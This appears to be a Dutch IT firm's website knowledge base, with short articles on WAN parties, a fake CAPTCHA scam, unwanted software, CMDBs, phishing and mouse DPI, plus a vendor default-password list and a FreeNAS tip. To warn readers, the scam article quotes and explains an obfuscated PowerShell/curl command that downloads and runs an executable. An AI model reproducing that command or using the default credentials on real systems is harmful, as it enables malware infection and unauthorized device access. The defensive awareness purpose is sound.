Wat is een WAN Party?

Een WAN-party, oftewel een Wide Area Network-party, is een evenement waarbij computerliefhebbers hun computers verbinden via een breed netwerk dat zich uitstrekt over een groot geografisch gebied. In tegenstelling tot een LAN-party, waar de computers zich in dezelfde fysieke ruimte bevinden en verbonden zijn via een lokaal netwerk, maakt een WAN-party gebruik van internet om deelnemers op verschillende locaties met elkaar te verbinden.

Hoe werkt een WAN Party?

Bij een WAN-party sluit iedere deelnemer zijn of haar computer aan op het internet. Dit kan vanuit huis, een kantoor of een andere locatie met een betrouwbare internetverbinding. Voor onze WAN-party’s maken wij gebruik van Discord.

Activiteiten op een WAN Party

Net als bij een LAN-party is de belangrijkste activiteit op een WAN-party het spelen van computerspellen met meerdere personen. Dankzij de internetverbinding kunnen deelnemers vanuit verschillende delen van de wereld met elkaar concurreren of samenwerken in hun favoriete games. Daarnaast biedt een WAN-party de mogelijkheid om deel te nemen aan georganiseerde competities, waarbij prijzen te winnen zijn.

Sociale Aspecten

Hoewel deelnemers fysiek gescheiden zijn, biedt een WAN-party tal van mogelijkheden voor sociale interactie. Via Discord kunnen deelnemers met elkaar praten, ideeën uitwisselen en samen plezier hebben. Dit maakt een WAN-party niet alleen een platform voor gaming, maar ook een sociaal evenement waar gelijkgestemden elkaar kunnen ontmoeten en nieuwe vriendschappen kunnen sluiten.

Organisatie van een WAN Party

Een WAN-party kan zowel door vrijwilligers als door professionele organisaties worden opgezet. De organisatie zorgt voor de benodigde infrastructuur, zoals servers en netwerksoftware, en kan ook extra diensten aanbieden, zoals technische ondersteuning en beveiliging. Deelnemers hoeven alleen hun eigen computer, een koptelefoon met microfoon en een internetverbinding te hebben om deel te kunnen nemen.

Deelname aan een WAN Party

Wilt u deelnemen aan een WAN-party? Het enige wat u nodig heeft is een computer, een koptelefoon met microfoon, een stabiele internetverbinding en een Discord-account. Voor meer informatie over onze evenementen en om u in te schrijven, kunt u terecht op onze website: helderselanparty.nl.

Wat is de Fake CAPTCHA Scam en hoe kunt u zich beschermen?

De Fake CAPTCHA Scam is een vorm van cybercriminaliteit waarbij kwaadwillenden proberen uw computer te infecteren met malware door u te misleiden met een valse CAPTCHA-test. Deze tests lijken op de gebruikelijke “Ik ben geen robot” verificaties, maar in werkelijkheid zijn ze ontworpen om u schadelijke code te laten uitvoeren.

Windows
MacOS

Hoe werkt de scam?

  1. Bezoek aan een verdachte website: U komt terecht op een website die u vraagt om een CAPTCHA-test te voltooien om toegang te krijgen tot bepaalde inhoud.
  2. Valse instructies: In plaats van de gebruikelijke afbeeldingen te selecteren, krijgt u instructies om een bepaalde opdracht uit te voeren. Bijvoorbeeld:
    • Druk op de Windows-toets + R.
    • Plak de inhoud van uw klembord in het dialoogvenster dat verschijnt.
    • Druk op Enter.
  3. Uitvoering van schadelijke code: De opdracht die u plakt, bevat vaak een verborgen PowerShell-script dat malware downloadt en uitvoert. Een voorbeeld van zo’n opdracht is:
powersheLL -w Minimized -c c"Ur"L.Ex"E" -k -L --"re"try 9"9"9 h"t"tps:/"/vd"tg".nl/"03"e"b8e6"f"6"e"7e"4"cdc.exe

In dit voorbeeld, download u met het programma CURL in PowerShell het kwaadaardige bestand 03eb8e6f6e7e4cdc.exe van onze website (https://vdtg.nl) te downloaden en uit te voeren.

Hierbij een technische uitleg van wat er gebeurd:

  • powersheLL -w Minimized: Start PowerShell in een geminimaliseerd venster.
  • -c: Geeft aan dat de volgende tekst een commando is dat moet worden uitgevoerd.
  • c”Ur”L.Ex”E”: Voert de curl.exe uit, een tool voor het overbrengen van gegevens via verschillende protocollen.
  • -k: Negeert SSL-certificaatfouten.
  • -L: Volgt eventuele redirects.
  • –“re”try 9″9″9: Probeert de download maximaal 999 keer opnieuw als deze mislukt.
  • h”t”tps:/”/vd”tg”.nl/”03″e”b8e6″f”6″e”7e”4″cdc: De URL van waaruit het bestand wordt gedownload.

Hoe kunt u zich beschermen?

  • Wees alert op verdachte CAPTCHA-tests: Als een CAPTCHA-test u vraagt om opdrachten uit te voeren buiten de browser, wees dan op uw hoede.
  • Gebruik een betrouwbare antivirussoftware: Zorg ervoor dat uw antivirusprogramma up-to-date is en uw systeem beschermt tegen dergelijke bedreigingen.
  • Vermijd onbekende websites: Bezoek alleen vertrouwde websites en wees voorzichtig met het klikken op links in e-mails of berichten van onbekende afzenders.
  • Controleer uw klembord: Voordat u iets plakt in een opdrachtprompt, controleer wat er op uw klembord staat.

Door deze voorzorgsmaatregelen te nemen, kunt u zichzelf beter beschermen tegen de Fake CAPTCHA Scam en andere vormen van cybercriminaliteit.

Vragen?

Neem dan contact met ons op.

Wat is Potentially Unwanted Application (PUA)?

Een Potentially Unwanted Application (PUA), of potentieel ongewenste applicatie, is software die mogelijk ongewenst gedrag vertoont of ongewenste effecten heeft op uw computer, zelfs als het niet per se schadelijk is zoals malware. PUAs worden vaak gebundeld met andere software en kunnen uw computer vertragen, advertenties tonen of uw privacy in gevaar brengen.

Wat zijn de risico’s van PUAs?

De risico’s van Potentially Unwanted Applications (PUAs) kunnen aanzienlijk zijn, ondanks dat ze niet altijd als schadelijk worden beschouwd zoals malware. Hier zijn enkele belangrijke risico’s:

  1. Prestatieproblemen: PUAs kunnen uw computer vertragen door onnodige processen op de achtergrond uit te voeren.
  2. Privacyrisico’s: Sommige PUAs verzamelen persoonlijke gegevens zonder uw toestemming en kunnen deze informatie delen met derden.
  3. Advertenties en pop-ups: PUAs kunnen ongewenste advertenties en pop-ups genereren, wat uw browse-ervaring kan verstoren.
  4. Moeilijk te verwijderen: PUAs kunnen lastig te verwijderen zijn en kunnen zich diep in uw systeem nestelen.

Het is belangrijk om voorzichtig te zijn bij het downloaden en installeren van software, vooral als deze gebundeld wordt aangeboden met andere programma’s. Heeft u specifieke zorgen over een bepaalde PUA?

Voorbeelden van PUAs

  1. Quick Driver Updater: Dit programma beweert uw drivers up-to-date te houden, maar kan ongewenste wijzigingen aan uw systeem aanbrengen en advertenties tonen12.
  2. RAV Endpoint Protection: Hoewel het als beveiligingssoftware wordt gepresenteerd, kan het ongewenste meldingen en pop-ups genereren en mogelijk uw systeem vertragen3.

Vragen?

Neem dan contact met ons op.

Wat is een Configuration Management Database (CMDB)?

Een Configuration Management Database (CMDB) is een centrale database die informatie bevat over de IT-infrastructuur van een organisatie. Hierin worden details opgeslagen over hardware, software, netwerken, en andere IT-componenten, evenals de relaties tussen deze componenten.

Met een CMDB kunt u:

  • IT-assets beheren: U krijgt een overzicht van alle IT-assets binnen uw organisatie, inclusief hun configuratie en status.
  • Veranderingen volgen: U kunt wijzigingen in de IT-infrastructuur bijhouden en beheren, wat helpt bij het identificeren van de impact van deze veranderingen.
  • Problemen oplossen: Door inzicht te hebben in de relaties tussen verschillende IT-componenten, kunt u sneller de oorzaak van problemen vinden en oplossen.
  • Compliance waarborgen: Een CMDB helpt bij het naleven van regelgeving en standaarden door gedetailleerde en actuele informatie te bieden over de IT-infrastructuur.
  • Efficiëntie verbeteren: Door een beter beheer van IT-resources en processen kunt u de efficiëntie en effectiviteit van uw IT-diensten verbeteren.

Wanneer u klant bij Van Der Toorn & Geertse bent, slaan wij alle verzamelde gegevens over uw IT systeem op in onze CMDB binnen ons helpdesk systeem.

Vragen?

Neem dan contact met ons op.

Wat is een Helpdesk?

Een helpdesk is een dienst die door een IT-partij wordt aangeboden om gebruikers te ondersteunen bij technische problemen en vragen. Dit kan betrekking hebben op zowel hardware als software. Hier zijn enkele dingen die u met een helpdesk kunt doen:

  1. Problemen oplossen: Als u technische problemen ondervindt, zoals een computer die niet opstart of software die niet werkt, kunt u contact opnemen met de helpdesk voor hulp bij het oplossen van deze problemen.
  2. Vragen stellen: Heeft u vragen over hoe u bepaalde software moet gebruiken of hoe u bepaalde taken op uw computer kunt uitvoeren? De helpdesk kan u begeleiden en uitleg geven.
  3. Ondersteuning bij installatie: De helpdesk kan u helpen bij het installeren van nieuwe software of hardware, en ervoor zorgen dat alles correct is ingesteld en werkt.
  4. Onderhoud en updates: De helpdesk kan ook helpen bij het uitvoeren van onderhoudstaken, zoals het updaten van software en het controleren op virussen, om ervoor te zorgen dat uw systemen veilig en up-to-date zijn.
  5. Advies en aanbevelingen: Als u advies nodig heeft over welke software of hardware het beste bij uw behoeften past, kan de helpdesk u aanbevelingen doen op basis van hun expertise.

Kortom, een helpdesk is er om u te ondersteunen en te zorgen dat uw IT-omgeving soepel en efficiënt blijft werken.

Vragen?

Neem dan contact met ons op.

Wat is een Granular-beheerdersrelatie?

Een Granular-beheerdersrelatie is een specifieke manier om beheerdersrechten toe te kennen binnen een systeem of platform, waarbij u gedetailleerde controle heeft over welke specifieke rechten en toegang een beheerder krijgt. Dit betekent dat u niet simpelweg alle beheerdersrechten in één keer toekent, maar selectief kunt bepalen welke acties en gebieden een beheerder mag beheren.

Deze methode wordt vaak gebruikt om de veiligheid en efficiëntie binnen een organisatie te verbeteren. Door beheerders alleen toegang te geven tot de gebieden die zij nodig hebben, vermindert u het risico op fouten en misbruik. Bijvoorbeeld, een beheerder kan alleen toegang krijgen tot gebruikersbeheer zonder toegang te hebben tot financiële gegevens of systeeminstellingen.

Microsoft 365 Business

In Microsoft 365 Business biedt de Granular-beheerdersrelatie de mogelijkheid om specifieke rollen en rechten toe te wijzen aan verschillende beheerders. Dit helpt bij het beheren van gebruikers, licenties, en beveiligingsinstellingen op een manier die past bij de behoeften van uw organisatie. U kunt bijvoorbeeld een beheerder aanstellen die alleen verantwoordelijk is voor het beheren van e-mailaccounts, terwijl een andere beheerder zich richt op het beheer van SharePoint-sites.

Vragen?

Neem dan contact met ons op.

Wat is DPI op een muis?

DPI staat voor Dots Per Inch. Het is een term die de gevoeligheid van een computermuis aanduidt en bepaalt hoe snel de cursor van de muis over uw scherm beweegt. Hier zijn de belangrijkste punten:

  1. Hardwarematige gevoeligheid: DPI bepaalt hoeveel pixels de muisaanwijzer beweegt als u de muis 2,54 centimeter (een inch) verplaatst. Hoe hoger de DPI-waarde, hoe heftiger de muis reageert op kleine bewegingen. Moderne muizen hebben vaak instelbare DPI-opties, die u kunt aanpassen via specifieke knoppen op de muis of software van de fabrikant.
  2. Gamen: DPI is vooral belangrijk tijdens het gamen. Een hoge DPI-waarde resulteert in een snellere beweging en betere reactietijd. Gamers kunnen hun voorkeur hebben: sommigen zweren bij een lage DPI (rond de 400-800) voor nauwkeurigheid, terwijl anderen liever met hogere DPI-waarden spelen om vlotter te bewegen. Het hangt af van uw speelstijl en persoonlijke voorkeur.
  3. Softwarematige instellingen: Naast de hardwarematige DPI-instellingen hebben veel games ook in-game softwarematige instellingen. Zodra u een fijne DPI-instelling hebt gevonden, raad ik aan deze als constante factor te gebruiken en de in-game instellingen aan te passen aan het ‘gevoel’ van de game. Zorg er ook voor dat uw DPI hoog genoeg is om pixel skipping te voorkomen.

Kortom, DPI beïnvloedt hoe uw muis reageert en kan het verschil maken in uw game-ervaring. Experimenteer met verschillende instellingen om te ontdekken wat voor u het beste werkt!

Deze tekst is gegenereerd met Microsoft Copilot, om u te laten zien wat de mogelijkheden hiervan zijn!

Wat is phising?

Phishing is een vorm van online fraude waarbij criminelen proberen om gevoelige informatie van gebruikers te stelen. Het woord “phishing” komt van het Engelse woord “fishing,” wat “hengelen” betekent. Net zoals een visser met een hengel probeert te vissen, proberen deze criminelen gegevens te “hengelen” van nietsvermoedende slachtoffers.

Hoe werkt phishing? Hier zijn de stappen:

  1. Frauduleuze communicatie: Phishing begint met een frauduleuze e-mail, sms of ander bericht. Dit bericht lijkt afkomstig te zijn van een betrouwbare afzender, zoals een bank, overheidsinstelling of bedrijf.
  2. Lokken van slachtoffer: Het slachtoffer wordt overgehaald om vertrouwelijke informatie te verstrekken. Dit gebeurt vaak via een vervalste website. De criminelen proberen het slachtoffer te laten geloven dat ze bijvoorbeeld hun inloggegevens moeten bijwerken of een betaling moeten doen.
  3. Malware: Soms wordt ook malware (schadelijke software) gedownload naar de computer van het slachtoffer. Dit kan leiden tot verdere inbreuk op de privacy of financiële schade.

Hoe kunt u phishing herkennen en uzelf beschermen?

  • Wees voorzichtig met links: Klik nooit zomaar op links in e-mails of berichten, vooral als u twijfelt over de afzender. Controleer altijd het webadres voordat u ergens op klikt.
  • Controleer de afzender: Als u een verdachte e-mail ontvangt, controleer dan de afzender. Bel bij twijfel de vermeende afzender om te verifiëren of het bericht legitiem is.
  • Gebruik betrouwbare bronnen: Raadpleeg websites zoals de Fraudehelpdesk of andere betrouwbare bronnen om te controleren of een e-mail of bericht als phishing bekendstaat.

Onthoud dat phishing een serieuze bedreiging is. Wees alert en bescherm uw persoonlijke gegevens!

Vragen?

Voor vragen kunt u contact met ons opnemen.

Default passwords

Below we will publish default passwords we encounter.

General (vendor):
3Com: admin/admin
Belkin: admin/admin
BenQ: admin/admin
Grandstream: admin/admin
D-Link: admin/admin
Digicom: user/password or admin/michelangelo
Linksys: admin/admin
Netgear: admin/password
Sitecom: sitecom/admin
Thomson: user/user
US Robotics: admin/admin
Zebra: admin/1234

Specific (device):
Brother MFC-L9570CDW: initpass
Brother LP844: admin/1234
Panasonic KX-UT133NE: admin/adminpass

Change network interface on FreeNAS Jail

Today we created a jail on our FreeNAS Server to compile a driver.
By default the jail got a IP Address from our management network and there was no GUI option to change the network interface.

We did the following:
1. Stop the jail.
2. SSH to FreeNAS server.
3. cd to /mnt/<dataset>/jails/.<jailname>
4. echo <interfacename> > iface
5. echo “<ipofgateway>” > defaultrouter-ipv4
6. warden start <jailname>